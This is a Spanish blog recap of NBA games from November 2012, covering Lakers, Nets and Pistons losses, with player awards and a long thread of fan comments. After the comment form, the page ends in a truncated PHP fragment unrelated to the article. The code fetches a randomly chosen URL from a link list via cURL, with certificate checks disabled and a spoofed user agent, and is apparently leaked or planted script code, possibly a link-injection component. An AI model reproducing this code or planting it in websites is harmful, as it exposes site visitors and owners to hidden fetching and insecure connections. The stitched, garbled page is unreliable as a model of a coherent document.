La Crónica: Depresión

08 de November de 2012 por txusma

Día triste para muchos aficionados. Muchos equipos tienen motivos más que sobrados para visitar el psicoanalista y tomarse un par de Prozacs. Para empezar duele ver un 1-4 en una escuadra con el potencial de los Lakers. No es pecado perder en Salt Lake, pero sí lo son las formas: No se llegó al 35% en tiros de campo, se desperdiciaron 14 tiros libres y,  lo peor, fue que repartieron 11 asistencias pero perdieron 18 balones (86-95). Calamidad. No les ajustició Durant o CP3. Lo hizo Randy Foye.

Más deprimente si cabe es un marcador NBA tan grotesco como el 62-77 que firmaron Sixers y Hornets. Un bodrio del que sólo disfrutaría Maljkovic.  62 puntos es marca histórica de la franquicia y razón suficiente para prenderle fuego al abono de los Hornets, especialmente en paladares que vieron nacer el Jazz (77-62).

En Atlanta, los Pacers vieron como pasaron de ganar fácil a los Hawks tras anotar 77 puntos en los 3 primeros cuartos, a perder el partido tras colapsarse en el último cuarto y anotar sólo 9 puntos (86-89). Parcial de 18-0 con Korver ejecutando. Danny Granger volverá en 3 meses. Nunca hubiéramos pensado que era tan imprescindible.

Perder es duro pero hacerlo de 30 tras quedarte en 73 puntos es humillante. Eso es lo que les pasó a los flamantes nuevos ricos Brooklyn Nets que se estrellaron ante los campeones cual coche de pruebas contra un muro. 12 asistencias y 19 pérdidas para deleite de Avery Johnson. Deron no dormiría demasiado bien anoche (73-103).

Otros que se quedaron por debajo de los 80 puntos fueron los Magic y eso que los Wolves no son precisamente la defensa más feroz de la liga. No funcionó el invento del frontcourt con Vucevic, McRoberts y Davis. Ocurrencia un tanto extraña tal y como estaba marchando todo (75-90).

El sueño de Cleveland se apaga poco a poco con Varejao y Zeller lesionados hasta no se sabe bien uando. Por parte de GS, Lee parecía Sabonis pero Bogut se solidarizó disputando sólo 17 minutos sin un solo punto que llevarse a la boca (96-106). Peor están en Detroit que todavía andan con 0 victorias tras 5 partidos disputados. Anoche la rozaron en Sacramento. Triple doble de Monroe en un bonito duelo contra Cousins pero ni por esas. ¿Quién será el fulano ese que se parece a Stuckey? (103-105)

Terminando que ando espeso… Kenneth Faried se cargó a los Rockets; Gortat, Beasley lideraron a los Suns contra Bobcats para conseguir la victoria; los Celtics sudaron hasta la prórroga para doblegar a Washington, y Clippers y Grizzlies rompieron la imbatibilidad de Spurs y Bucks. Sólo quedan los Knicks.

PREMIOS

MVP: Muchos decían: “A ver que hace Marcin Gortat sin Nash al lado”. Pues aquí tienen la respuesta: 23 puntos con un 10 de 14, 10 rebotes y 7 tapones. El otro gran nombre del día es de David Lee que ha pesar de la fiebre se las arregló para llegar a los 22 puntos, 14 rebotes y 6 asistencias.

Rookie: Buenas actuaciones de varios jóvenes: Michael Kidd Gilchtrist sumó 9 puntos, 8 rebotes, 3 asistencias y 3 tapones; Bradley Beal, 16 puntos y 4 rebotes; Mo Harkless, 7 puntos, 5 rebotes, 2 asistencias, 3 robos y 2 tapones; Alexey Shved, 7 puntos, 4 rebotes y 3 asistencias, y Bernard James, 6 puntos y 9 rebotes en 18 minutos;

Sorpresa: Sin duda, lo más sorprendente del día son los 24 puntos y8 rebotes de Byron Mullens. ¡No por los números en sí sinó porque anotó 6 triples de 10 intentos! Por su parte, Larry Sanders parece que le roba protagonismo y minutos a Samuel Dalembert. Anoche consiguió un doble de 10 puntos y 11 rebotes a los que sumó 3 tapones.

Decepción: Horrible partido de los Lakers y en particular de Pau Gasol que se quedó en 5 míseros puntos. Los Brooklyn Nets no pueden estar mucho más contentos después de caer por una diferencia de 30 puntos ante los Heat. ¿Estos querían ser la alternativa en el Este? Finalmente, New Orleans, sin Eric Gordon ni Anthony Davis, se quedó en 62 puntos…

Esfuerzo en vano: Triple doble de Greg Monroe que no sirvió para estrenar el casillero de victorias de los Pistons. Sus 21 puntos, 12 rebotes y 11 asistencias fueron insuficientes.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

16 comentarios a esta entrada

  1. Pop dice:
    #1

    Yo estuve viendo el partido de los Lakers hasta poco después del descanso, cuando me fui a dormir con muy mala leche y un principio de migraña.

    Hacía tiempo que no me quedaba a ver uno de LA y quería cercionarme de todo lo que se dice de Mr Potato, porque leía los palos que se le daban, y joder, se les quedan cortos. He pasado vergüenza ajena. Como dije anoche, parecían niños en el patio de un colegio, echando a correr con la bola hasta llegar al otro lado y a ver qué pasa. Absolutamente NINGÚN sistema. No se meten balones adentro para Howard. No se hace el pick con Pau. No juegan a pantallas para Kobe. Nada de nada. Cada uno a lo suyo.

    En cuanto a Pau, directamente lo pasé mal viéndolo. Un tío que está acostumbrado al juego inteligente, y que es realmente donde es uno de los mejores del mundo, tiene que estar desarrollando úlceras. Da pena verle intentar coger posiciones y ofrecer bloqueos para que al final todos corran de un lado para otro como pollos sin cabeza. No me extraña su bajón, en este tipo de “juego” Pau no vale para nada. Sus números anoche fueron penosos, sí, pero os animo a que miréis los tiros, de dónde y cómo lanzó.

    En fin, no entiendo como una dirección técnica siendo la que es, posiblemente la mejor de la NBA en los despachos, haya conseguido juntar tales estrellas del basket y permitan a un mentecato como Brown mearse literalmente en su trabajo.

      Citar

  2. Esteban dice:
    #2

    ta hoy mismo delonte WEST a los lakers y todos sus problemas solucionados

      Citar

  3. Esteban dice:
    #3

    sobre cavs vs warriors, hay q decir que irving va en camino a ser all-star este año, es impresionante, pensar q mucho se dudo de el y algunos preferian a derrick williams como pick 1,

    sobre warriors, si bogut pudiera ayudar algo mas, serian un equipo 100% de PO, por ahora estan para pelearla

      Citar

  4. GreenPride dice:
    #4

    Vaya tela lo de los Lakers. Menos del 35% en tiros de campo, menos del 20% en triples, menos del 70% en libres. ¿Ataque Princeton? ¿En serio? Más bien caos Princeton. ¿Alguien me puede explicar por qué Artest tira 12 veces a canasta siendo el segundo jugador con más tiros? Además todos los titulares con unos 37 minutos de juego (¿Alguien intenta salvar su culo?). Son un equipo veterano y el amigo Marrón les va a fundir como sigan a este ritmo. Meeks no jugo, Sacre no jugó, Jamison 13 minutitos. Si Al Jefferson y Paul Millsapp igualan o superan a Gasol-Howard es que algo está fallando. Además está el problema de defender a los bases-escoltas contrarios. Hasta ahora todo base medio rápido y anotador contrario se está riendo de la defensa laker creando continuamente desajustes. Ya sabíamos que Nash no tiene su punto fuerte en la defensa y Blake es un tirillas y no puede con los bases que juegan en la liga. Ayer Mo Williams se puso las botas y cuando ayudaron Randy Foye los acribilló de tres (hasta se echa en falta a un tío como Fisher que conozco su oficio). Es muy pronto en la temporada y hay que dar tiempo pero a este ritmo el amigo Miguel Marron no llega ni a los 20 partidos.
    Los Celtics son otro de los que defrauda de momento y aunque han conseguido salvar sus dos partidos con unos Wizards sin Nene ni Wall con victorias les queda un mundo para ser un aspirante al anillo.
    Despiertan los Nuggets y empiezan a ver la realidad los Rockets (primer partido malo del barbas). Ambas cosas eran de esperar. Por cierto ¡Que animal que es Faried!
    Dallas sigue ganando sin Dirk con Kaman a gran nivel y Mayo rindiendo a todo trapo. Funcionan estos Mavs que podrían ser la sorpresa del Oeste.
    Otro que vuelve a su realidad es Orlando (Glen Davis 4 puntitos) y los Wolves siguen ganando sin Ricky ni Love. Otro equipo que puede estar arriba y animar la competición.
    Sólidos los Grizzlies que mientras tengan a Marc&Zach a este nivel pueden ganar a cualquiera y decepcionan los Pacers que se quedan además sin Granger por 3 meses y con Hibbert rindiendo muy por debajo de lo esperado. Otro que aspira a sorpresa del año son los Warriors que tienen equipo para hacer mucho si las lesiones respetan a Bogut y Curry.
    De Clippers, Spurs, Heat y Nets no hablo que veré los partidos luego.

      Citar

  5. Esteban dice:
    #5

    cuiadado con los MAVS, le faltan muchas cosas para ser candidatos al titulo, pero una dupla interior con dirk y kaman ofensivamente es la mejor de la liga, Mayo recuperando sensaciones de crack, y vince cartr jugando el su mejor baloncesto de los ultimos 3 años, les falta un alero suplente y un base titular de jerarquia para aspirar a todo, me suena mucho a CALDERON y hasta josh HOWARD, ahi si veria material suficiente para soñar

      Citar

  6. Esteban dice:
    #6

    PACERS sin GRANGER, mi sueño, la oportunidad!!

    siempre dije que queria a granger fuera y a george de alero, pero siempre supuso que en luigar de granger llegaria un escolta anotador, bueno no es lo mismo granger a cambio de nada que granger a cambio de monta ellis o marcus thorton o derozan

    igualmente ahora que vogel sabe que no podra ver a granger, mandara a la titularidad a Lance Stephenson, quien debe demostrar que esta hecho para ser un estrella

      Citar

  7. Esteban dice:
    #7

    la verdad dio ena ver a los pacers ijntentar cerrar el juego frente a los hawks con george tirando el tiple del final que paso a un metro el aro, lo anticipabamos en el analisis, sin un cerrador de juegos, los pacers no llegaran muy lejos

      Citar

  8. Ruxixón dice:
    #8

    Miami es una máquina perfecta,todos sabes dónde están,que gran progreso como equipo han logrado desde el final de la temporada pasada.Recuerdo que en la 11/12 LeBron ni Wade tiraban triples por falta de confianza,se dudaba de Joel Anthony en el puesto de C y Rashard Lewis era una escoria como jugador de baloncesto.Abres los ojos a día de hoy y LeBron sin miedo en el T3,la falta de pívot no se ve como un problema si no que hay confianza en los recursos que tienes y ¡¡¡Lewis es hasta un jugador de baloncesto válido como 6º hombre!!!

    Por los Nets les vi que trabajaron muy poco por dentro y han estado en el partido con un poquito de Deron y el empuje de Humphries,muy poco para luchar contra los campeones.Por otra parte la aportación desde el banquillo dejando a Marshon Brooks al margen ha sido ridícula,el pobre Teletovic ha estado negado hoy.

    Lo de Monroe hay que estudiarlo,yo propongo un cambio de pistones a amortiguadores y que el equipo se llame a partir de ahora “Detroit Monroe” porque el probe ya tiene que hacer de todo en esa m**** de equipo.Drummond 6 minutos para decepción del blog.Y siguiendo con los pívots,a Hibbert hay que exigirle que de el paso al frente que se lleva exigiendo desde hace 2 temporadas y en ésta,con megacontrato bajo el brazo,no puedes esconderte,eres el tio que más cobra en la plantilla joder.

    Me niego a comentar nada de los Lakers,hay que ser cateto para no tomar ninguna decisión por allí.

      Citar

  9. Ruxixón dice:
    #9

    Por cierto,dos cosas.

    1º Con el señor Mike Brown al mando de los Cavaliers estos hicieron lo que hicieron así que gran valor de LeBron de llevar a ese equipo hasta donde pudo a pesar que no logró el campeonato.La comparación está en ese equipazo angelino que no hay por donde cogerlo.

    2º Mucho valor para los Knicks que siendo los únicos imbatidos de la NBA han sido los únicos que han ganado a los Heat.¿Puede ser su año o la misma cantinela de siempre?

      Citar

  10. rumbero dice:
    #10

    Esteban:
    ta hoy mismo delonte WEST a los lakers y todos sus problemas solucionados

    Pues no es mala idea. Con suerte se presenta un día en el entrenamiento psitola en mano y Brown ya no vuelve más del susto.
    Coñas aparte, después de ver los últimos partidos de los Nuggets me declaro fan absoluto de Manimal. Que tio, pura intensidad. Como curiosidad comentaban que el chaval lleva más rebotes ofensivos que defensivos en lo que va de temporada. Él y McGee+Koufos no tendran tanto nombre como otros pero van a hacer sudar a cualquiera que se acerque a la pintura.

      Citar

  11. Esteban dice:
    #11

    Vale la pena el riesgo, un uno/dos capaz de anotar y revolucionar saltando del banquillo podria ser el cambio de cara q los lakers necesitan

    Pietrus?

    Lo cierto es q los lakers deben mejorar el ala, metta y eubanks juntos deben estar entre los 5 peores duplas de aleros de la nba

      Citar

  12. Jose Luis dice:
    #12

    Ruxixón, si Lebron y Wade no tiraban triples era por consignas de Spo, que les quería metidos en el poste donde pueden hacer más daño dada su ineficacia en los triples. Consignas que se están perdiendo y que, para mí, sólo hacen perjudicar a Miami.

      Citar

  13. nba dice:
    #13

    El tema Lakers sera mejor olvidarse, como desde la direccion de la franquicia parece que quieren hacer oidos sordos al clamor popular y Kobe al menos de puertas afuera no dirije ninguna critica al entrenador pues lo seguiran manteniendo contra toda logica y manchando el prestigio de la franquicia.
    Habra que centrarse en equipitos con potencial como Houston/Miny/Warriors para disfrutar un poco del baloncesto, ya que el resto son equipos consolidados y que suelen cumplir noche tras noche.
    A ver si va a resultar que Derrick Williams nos lee, el otro dia hablamos de su pobre rendimiento y parece que ha subido un poco su intensidad/acierto para mandarnos callar las bocas, seguro que Amar’e le ha soplado la direccion web, aunque los Magic no sea una piedra de toque para evaluar si realmente ha decidido subir las prestaciones

      Citar

  14. gabrielj dice:
    #14

    buena remontada de los Hawks que se metieron ellos solos en el lío con un apagón tremendo en el tercer cuarto, técnicas incluidas, perdían de 14 faltando menos de 6 minutos pero un 2+1 de Horford y 8 puntos seguidos de Korver les metieron de nuevo en el partido y Teague dio la puntilla

    me gustan estos Hawks, se han reinventado, la salida de Joe Johnson les ha venido de perlas, quizás echan en falta sus puntos pero bien que les ha venido perder de vista su obsesión por el 1vs1

      Citar

  15. Sempren dice:
    #15

    Esteban:
    igualmente ahora que vogel sabe que no podra ver a granger, mandara a la titularidad a Lance Stephenson, quien debe demostrar que esta hecho para ser un estrella

    Hizo una muy buena Summer League, y ahora parece que está haciendo buenos números, sobre todo para alguien joven y que el año pasado apenas estuvo en cancha. Incluso da bastantes asistencias, que creo recordar que era una de las cosas que más se le achacaban.

    Jose Luis:
    Ruxixón, si Lebron y Wade no tiraban triples era por consignas de Spo, que les quería metidos en el poste donde pueden hacer más daño dada su ineficacia en los triples. Consignas que se están perdiendo y que, para mí, sólo hacen perjudicar a Miami.

    Ya el año pasado los Heat tuvieron fases en las que hacían o deshacían sin un rumbo claro. Hubo épocas en las que Spoelstra prohibió correr, y aunque evidentemente seguían ganando muchos partidos por lo buenos que son, se especulaba mucho sobre si era lo más adecuado, teniendo bestias a la contra que lo hacen tan bien, y sin tener un center.
    El tema de los triples también es recurrente, el año pasado tiraron mucho menos que el anterior, pero cuando estaban desquiciados (o cuando ganaban muy muy cómodo), los volvías a ver por el camino del tiro lejano.

      Citar

  16. Esteban dice:
    #16

    serpen, ademas de las asistencias se le critico siempre su falta de tiro de 3 y lo ha mejorado notablemente, vogel tiene que jugarsela con el, tiene algo de talento para responder en ofensiva cosa que young no tiene

    por otro lado es entendible el cambio de green al banco, no como castigo pues no lo venia haciendo mal, por el contrario, le da algo de ataque en las alas a un equipo que en caso contrario, no tendria nada de ofensiva en el banco

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>